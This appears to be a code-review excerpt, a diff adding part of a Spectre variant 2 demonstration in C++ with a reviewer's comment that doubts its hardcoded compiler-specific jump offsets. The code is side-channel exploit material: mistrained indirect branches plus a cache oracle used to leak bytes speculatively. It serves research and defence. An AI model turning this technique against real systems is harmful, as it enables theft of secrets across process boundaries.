demos/spectre_v2.cc

```diff
@@ -0,0 +1,298 @@
+#endif
+FirstActualRead(const void *addr) {
+  // We read the value 100 times to have enough places to jump to.
+  Fetches<100>::generate(addr);
+}
+
+// DummyRead is between the two real reads, so that misjump chances are the
+// highest possible.
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+DummyRead(const void *addr) {
+  // Does nothing - only NOPs.
+  Nops<100>::generate();
+}
+
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+SecondActualRead(const void *addr) {
+  // Read it one more time to avoid compiler deduplication with jump to the
+  // FirstActualRead.
+  Fetches<101>::generate(addr);
+}
+
+static char LeakByte(const char *data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &oracle = sidechannel.GetOracle();
+
+  // Pointer to pointer to DummyRead so that we can easily flush it from
+  // the cache and start speculative execution.
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+  std::unique_ptr<void(*)(const void *)> dummy_reader =
+      std::unique_ptr<void(*)(const void *)>(new (void (*)(const void *)));
+#elif SAFESIDE_IA32
+  std::unique_ptr<void(SAFESIDE_FASTCALL *)(const void *)> dummy_reader =
+      std::unique_ptr<void(SAFESIDE_FASTCALL *)(const void *)>(
+          new (void (SAFESIDE_FASTCALL *)(const void *)));
+#else
+#  error Unsupported architecture.
+#endif
+
+  for (int run = 0;; ++run) {
+    sidechannel.FlushOracle();
+
+    // We pick a different offset every time so that it's guaranteed that the
+    // value of the in-bounds access is usually different from the secret value
+    // we want to leak via out-of-bounds speculative access.
+    size_t safe_offset = run % strlen(data);
+
+    // We are going to shift these pointers instruction-by-instruction (mov
+    // instruction in the case of real readers and nop instruction in the case
+    // of the dummy reader), so that we increase the amount of destination
+    // addresses;
+    char *first_ptr = reinterpret_cast<char *>(FirstActualRead);
+    char *second_ptr = reinterpret_cast<char *>(SecondActualRead);
+    char *dummy_ptr = reinterpret_cast<char *>(DummyRead);
+
+    for (int i = 0; i < 100; ++i) {
+      // Shift real readers to the next mov instruction and dummy reader to the
+      // next nop instruction to diversify destination addresses.
+#if SAFESIDE_X64 || SAFESIDE_IA32
+      // NOP has always one byte on X86/64.
+      dummy_ptr += 1;
+#  ifdef __clang__
+      // Clang uses movb to al as the blind fetch instruction and that has 2
+      // bytes.
+      first_ptr += 2;
+      second_ptr += 2;
+#  elif defined(__INTEL_COMPILER) && SAFESIDE_X64
+      // ICC generates cycles of length 8. First three are movs that have 2
+      // bytes (al, dl, cl), last five are movs that have 3 bytes (sil, r8b,
+      // r9b, r10b, r11b). On IA32 it behaves the same way as G++.
+      first_ptr += 2 + static_cast<bool>(i % 8 > 2);
+      second_ptr += 2 + static_cast<bool>(i % 8 > 2);
```

Comment:
This is frankly terrifying to me. If it turns out we need destination address diversity, can we get it by stamping out 100 functions (where the language lets us get the address) instead of computing 100 entry points to the same function?

If not, and we really need to hardcode observed compiler behavior back into the code to be compiled, let's add some early and explicit checks that will start failing if compiler behavior changes. For example, an assertion that the function code actually repeats every N bytes before deciding we can use N to compute jump targets.